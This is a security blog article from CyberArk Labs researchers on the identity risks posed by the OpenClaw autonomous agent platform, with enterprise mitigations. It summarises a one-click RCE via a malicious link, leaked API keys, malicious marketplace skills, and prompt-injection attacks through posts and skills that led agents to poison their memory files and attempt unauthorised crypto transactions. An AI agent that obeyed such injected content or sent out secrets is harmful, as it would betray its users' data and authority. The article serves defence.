The viral surge of OpenClaw (formerly Clawdbot and Moltbot) has captured the tech world’s imagination, amassing over 160,000 GitHub stars and driving a hardware rush for Mac Minis to host these 24/7 assistants. Dubbed “Claude with hands,” OpenClaw represents a significant shift: AI is moving from a helpful and allegedly obedient assistant to an all-powerful autonomous agent capable of managing emails, executing terminal commands, and interacting with apps like WhatsApp, Slack, and GitHub. These unpredictable and privileged entities, which can operate on behalf of their human creators and access the keys to their digital data kingdom, pose a significant risk.
For users, OpenClaw presents a powerful productivity tool. For enterprise CISOs, it’s a live-fire exercise in a new identity security attack surface. It represents an identity security nightmare, where traditional perimeters dissolve as autonomous entities operate with user-level permissions but without human-level predictability. It demonstrates the lethal trifecta of AI agent risk, a concept coined by security researcher Simon Willison, which includes access to private data, exposure to untrusted content, and the authority to act on a user’s behalf.
Imagine a developer accessing their OpenClaw environment from an enterprise machine or deploying it within the corporate network to integrate with Slack, Teams, or Salesforce. These actions create a high-risk gateway where autonomous agents operate outside the oversight of traditional identity and access management (IAM) controls. Without restricted access and rigorous identity management, a single logic lapse or exploit can trigger massive identity compromises and catastrophic data leaks, eventually handing the keys to the digital kingdom to a malicious attacker through an unvetted process.
The OpenClaw dangers: A wake-up call for enterprises
While OpenClaw promises local-first privacy, its rapid adoption has revealed critical security gaps that threaten the integrity of its autonomous ecosystem.
Security researcher Mav Levin of DepthFirst discovered the 1 Click RCE (CVE-2026-25253), where a malicious link triggers a WebSocket handshake to leak tokens and execute arbitrary shell commands.
A Wiz team led by Gal Nagli uncovered a misconfigured database in the Moltbook social network that exposed 1.5 million API keys, 35,000 user emails, and private messages. Nagli’s research also revealed that only 17,000 identities controlled the 1.5 million bots.
An audit of 2,857 skills on the ClawHub marketplace by Koi Security identified 341 malicious entries. This included 335 skills from the ClawHavoc campaign designed to deploy infostealers such as Atomic Stealer.
Security researchers at Permiso identified prompt-injection attacks that manipulated agents into poisoning their own internal memory files and attempting unauthorized cryptocurrency transactions via malicious posts on Moltbook and unvetted skills on ClawHub.
These issues are likely only the tip of the iceberg and carry frightening implications for identity security because OpenClaw agents operate with delegated authority. This means a single compromised skill or injected prompt can hijack a user’s entire digital persona to sign legal documents, access bank accounts, or impersonate them across the web.
Together, these incidents highlight a broader identity security challenge that arises when autonomous agents act with significant authority. Organizations need to recognize how quickly these risks can spread across an environment. These risks can be understood through three key pressure points that shape the identity security attack surface for autonomous agents in enterprise environments.
Mapping the identity security attack surface of autonomous agents
As these AI agents drift into corporate environments, often as “shadow AI” deployed by employees, they create three distinct pressure points:
1. Endpoint privilege and the “God Mode” fallacy: OpenClaw often requires high-level privileges to be useful. In an enterprise context, an agent on a developer’s laptop could inherit the ability to read SSH (Secure Shell) keys or modify source code at machine speed.
2. Exposed secrets and the token goldmine: Agents are hungry for credentials, often storing sensitive API keys in .env files or local directories. OpenClaw further risks Cognitive Context Theft by storing MEMORY.md and SOUL.md in plaintext.
3. Access, permissions, and in-session behavior: Traditional IAM is designed for humans, but AI agents are non-deterministic. An agent inherits the user’s permissions but may execute actions the user never intended.
Agentic AI security: Best practices and mitigations
OpenClaw is a harbinger of the agentic future. While currently in a viral experimentation phase, it could very well provide a blueprint for the autonomous bots that will eventually become foundational to enterprise operations.
Although these tools are not yet production-ready, developers, who are traditionally early adopters with a keen sense of exploration, are likely to deploy them locally now to automate complex workflows. Without proper mitigations, these “shadow” deployments allow agents to operate with high-level privileges, inheriting access to SSH keys and internal codebases before security teams can establish oversight.
Furthermore, even if the agent is not hosted locally, accessing an external deployment UI from within the enterprise creates a direct path for exfiltrating sensitive secrets and tokens to unauthorized third-party environments.
To address these risks effectively, organizations can structure their defenses around the same three areas described above: endpoint privilege, exposure of sensitive information, and access behavior. The following recommendations align with those three areas.
Endpoint privilege: The “God Mode” fallacy
To defend against privilege escalation, organizations can use these controls:
- Sandbox isolation: Run agents like OpenClaw in hardened, read-only containers, such as Docker or a dedicated virtual machine, to prevent them from accessing the host’s root filesystem or SSH keys.
- Command and filesystem allow-listing: Configure explicit lists of authorized terminal commands and directory paths the agent can interact with, rather than granting open-ended access.
- The surgical kill switch: Maintain the technical capability to immediately suspend an agent’s local identity and kill its active processes without disrupting the broader human user’s session.
Exposed secrets: The token goldmine
To reduce the risk of exposure from secrets sprawl, teams should take these steps:
- Secrets rotation and injection: Implement automated rotation for all keys the agent uses. Rather than storing credentials in plaintext files (like .env), inject them into the agent’s environment at runtime.
- Scoped and ephemeral tokens: Transition away from “full access” tokens. Use short-lived, task-specific credentials that automatically expire, limiting the window of opportunity for an attacker who might compromise the agent’s memory.
- Proxy hardening: Configure host-side proxies to enforce network-level egress allow-listing. This ensures that even if an agent is tricked into stealing secrets, it cannot exfiltrate them to an unauthorized external domain.
Access: Permissions and in-session behavior
Ensuring secure access for autonomous systems requires:
- Zero standing privileges (ZSP): Adopt a just-in-time (JIT) access model where agents are granted permissions only for the specific duration of a task, ensuring they have no permanent access to sensitive databases or apps.
- Authenticated delegation: Move away from impersonation. Use OAuth-style delegation that links every agent’s action back to the human creator, requiring out-of-band (OOB) authentication (like a push notification) for high-risk or destructive actions.
- Session monitoring and discovery: Maintain a continuous inventory of all “shadow AI” agents. Use real-time observability to link non-deterministic agent behavior to the human user’s identity for clear auditability and risk scoring.
- Least privilege: Restrict the agent’s functional scope by defining “read-only” roles for data analysis tasks and strictly requiring human-in-the-loop (HITL) approval before the agent can modify system files or execute financial transactions.
These issues make it clear that OpenClaw offers an early view of the identity-focused risks that will appear as autonomous agents become more common in enterprise environments.
OpenClaw’s signal to enterprises: AI agent security must start now
OpenClaw’s tooling itself isn’t enterprise-grade, but it still offers a useful blueprint for understanding how autonomous agents can affect enterprise security. The unmanaged spread of OpenClaw and MoltBook shows how quickly identity‑focused risks can develop when agents operate with broad permissions and unpredictable behavior. To secure this frontier, enterprises must proactively mitigate the risk of agents inheriting excessive local privileges, which can allow them to exfiltrate SSH keys, modify system files, or access sensitive data by moving outside their intended sandbox.
By enforcing modern identity security controls like zero standing privileges, using secrets management to eliminate plaintext secrets, and requiring human-in-the-loop approval for high-risk actions, CISOs can strengthen the security and auditability of AI agent activity, even as their systems evolve from simple assistants into the fully autonomous digital workers of the future.
Lavi Lazarovitz is vice president of cyber research, and Mark Cherp is the director of security research at CyberArk Labs.
Explore more about OpenClaw risks and vulnerabilities
To learn more about the identity-related risks associated with OpenClaw and Moltbook, check out the video below from CyberArk Labs’ senior offensive evangelist Andy Thompson.
